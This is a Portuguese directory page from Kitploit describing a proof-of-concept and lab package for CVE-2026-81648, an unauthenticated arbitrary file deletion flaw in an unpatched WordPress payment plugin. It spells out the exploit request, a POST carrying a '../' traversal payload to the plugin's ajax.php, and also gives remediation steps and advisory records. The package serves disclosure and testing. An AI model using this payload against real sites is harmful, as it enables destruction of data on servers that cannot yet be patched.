Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-81648 — Prova de conceito de exploit e laboratório para CVE-2026-81648, uma falha de exclusão arbitrária de arquivos sem autenticação no plugin CryptoPayment Gateway do WordPress. | Kitploit
Ferramentas/GitHubGitHub/abraxas/cve-2026-81648
Scanners de VulnerabilidadesAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebVirtualização para SegurançaSegurança WebTestes de PenetraçãoLabs e Prática
GitHubabraxas/cve-2026-81648

CVE-2026-81648

Prova de conceito de exploit e laboratório para CVE-2026-81648, uma falha de exclusão arbitrária de arquivos sem autenticação no plugin CryptoPayment Gateway do WordPress.

há 1 diaAinda não revisado
Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Abraxas Labs — CVE-2026-81648 — WordPress

abraxaslabs.tech  ·  github.com/abraxas  ·  @abraxas_null  ·  CVE-2026-81648

CVE-2026-81648 — WordPress

WordPress — CryptoPayment Gateway 1.2.2 — Granwill

O plugin WordPress CryptoPayment Gateway da versão 1.2.1 à 1.2.2 não aplica uma verificação de autorização em um de seus endpoints AJAX, permitindo que usuários não autenticados invoquem operações administrativas, incluindo a exclusão de arquivos arbitrários no servidor, a sobrescrita da configuração do gateway de pagamento e a recuperação de credenciais de carteira armazenadas em texto claro.

CVECVE-2026-81648 · CVE.org
CWECWE-862
CVSSCrítico: 10.0 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
ProdutoWordPress — CryptoPayment Gateway
Afetado1.2.1–1.2.2
Corrigidosem patch público (WPScan: nenhuma correção conhecida)
Autenticaçãonenhuma (ver mapa do código-fonte)
LicençaGNU Affero GPL v3.0
Labapenas 127.0.0.1 · pacote de divulgação para fornecedor/cliente, não é um scanner

Aviso (do mapa do código-fonte)

delete-file em cryptd/ajax.php é o sink. O HTTP é esse arquivo PHP, não o admin-ajax.php.


Entrada

  • Método: POST
  • Caminho: /wp-content/plugins/cryptopayment-gateway/vendor/cryptd/ajax.php
  • Roteador: POST direto vendor/cryptd/ajax.php function=delete-file. Não é wp_ajax. O caminho é DIR/uploads/ + folder + file_name (5 .. a partir de uploads alcança wp-content).
  • Notas: CVE-2026-81648 CWE-862 CryptoPayment Gateway 1.2.2. Testemunha POCWitness81648 desaparecendo. Nenhum patch do fornecedor conhecido (WPScan). Não recupere chaves de carteira.

Cadeia de chamadas

  • GET /wp-content/poc81648/index.php expect POCWitness81648
  • POST ajax.php data={"function":"delete-file","file_name":"../../../../../poc81648/index.php","folder":""}
  • crpay_file_delete unlinks wp-content/poc81648/index.php
  • GET witness URL no POCWitness81648

Pré-condições do lab

  • CryptoPayment Gateway 1.2.2
  • wp-content/poc81648/index.php ecoa POCWitness81648

Testemunha

POCWitness81648 presente antes do POST, ausente depois. JSON de sucesso sem a exclusão não é isso.

Não é sucesso

  • JSON do ajax sem o arquivo desaparecer
  • ainda servindo POCWitness81648
  • excluir wp-config.php
  • despejar chaves de carteira
  • reverse shell

Patch / remediação

Faça isto primeiro: Não há patch público. Desative o CryptoPayment Gateway ou bloqueie vendor/cryptd/ajax.php até que exista uma versão do fornecedor.

Verifique após a atualização

  • Execute novamente CVE-2026-81648-Abraxas-Labs.py contra a build corrigida: a testemunha mapeada não deve aparecer.
  • Confirme o aviso do fornecedor / changeset na árvore implantada (ver referências).
  • Uma assinatura de WAF é atraso, não um patch.

Se você não puder atualizar imediatamente

  • Desative ou isole o componente afetado.
  • Procure a condição de testemunha em produção (novos usuários privilegiados, arquivos inesperados, linhas injetadas — o que o mapa deste CVE nomear).

Reprodução (lab autorizado)

Alvo apenas http://127.0.0.1:8088 (ou o loopback que você vinculou). Não aponte este script para a internet.

root@kitploit:~
python3 CVE-2026-81648-Abraxas-Labs.py

Sucesso é a testemunha acima no corpo da resposta. Um HTML 200 genérico não é isso.


Imagens do lab

Stack de loopback usada para reproduzir. Imagens oficiais, a menos que um Dockerfile nesta pasta faça build a partir do código-fonte.

  • lab/docker-compose.yml
  • lab/docker-compose.override.yml
  • lab/Dockerfile
root@kitploit:~
cd lab
docker compose up --force-recreate

Vincule a árvore do produto vulnerável ao lado do Compose se o YAML montar um diretório local (zip do plugin / tag de código-fonte da tabela de versões). Não publique nada exceto 127.0.0.1.


Referências

  • CVE-2026-81648 · NVD

  • CVE-2026-81648 · CVE.org

  • wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898/

  • github.com/advisories/GHSA-9r3q-6qw8-8pm7

  • nvd.nist.gov/vuln/detail/CVE-2026-81648

  • wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898

  • Diretório de plugins: cryptopayment-gateway

  • Navegador Trac: plugins.trac.wordpress.org/cryptopayment-gateway

  • Tags SVN: plugins.svn.wordpress.org/cryptopayment-gateway

  • Abraxas Labs: abraxaslabs.tech · github.com/abraxas · @abraxas_null


Registros (estruturados)

root@kitploit:~
# CVE-2026-81648  (structured records)

- input: `https://nvd.nist.gov/vuln/detail/CVE-2026-81648`
- CWE: CWE-862
- published: 2026-09-13T21:17:01.930

## NVD description

The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization check on one of its AJAX endpoints, allowing unauthenticated users to invoke administrative operations, including deleting arbitrary files on the server, overwriting the payment gateway configuration and recovering stored wallet credentials in cleartext.

## MITRE description

The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization check on one of its AJAX endpoints, allowing unauthenticated users to invoke administrative operations, including deleting arbitrary files on the server, overwriting the payment gateway configuration and recovering stored wallet credentials in cleartext.

## Affected

- Unknown CryptoPayment Gateway 1.2.1 affected

## References (JSON sources only)

- https://wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898/
- https://github.com/advisories/GHSA-9r3q-6qw8-8pm7
- https://nvd.nist.gov/vuln/detail/CVE-2026-81648
- https://wpscan.com/vulnerability/9b1490a0-1381-4d22-8086-f75aade4e898

## GitHub advisory

The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization...

The CryptoPayment Gateway WordPress plugin from 1.2.1 to 1.2.2 does not apply an authorization check on one of its AJAX endpoints, allowing unauthenticated users to invoke administrative operations, including deleting arbitrary files on the server, overwriting the payment gateway configuration and recovering stored wallet credentials in cleartext.

Licença

Este pacote de divulgação é licenciado sob a GNU Affero General Public License v3.0. Consulte LICENSE.


Isenção de responsabilidade

Este pacote é destinado ao fornecedor, ao proprietário do site e a labs licenciados. O script se comunica com 127.0.0.1. Usá-lo contra sistemas que você não possui não é autorizado pela Abraxas Labs. Sem garantias.

abraxaslabs.tech · github.com/abraxas · @abraxas_null

Baixar ferramenta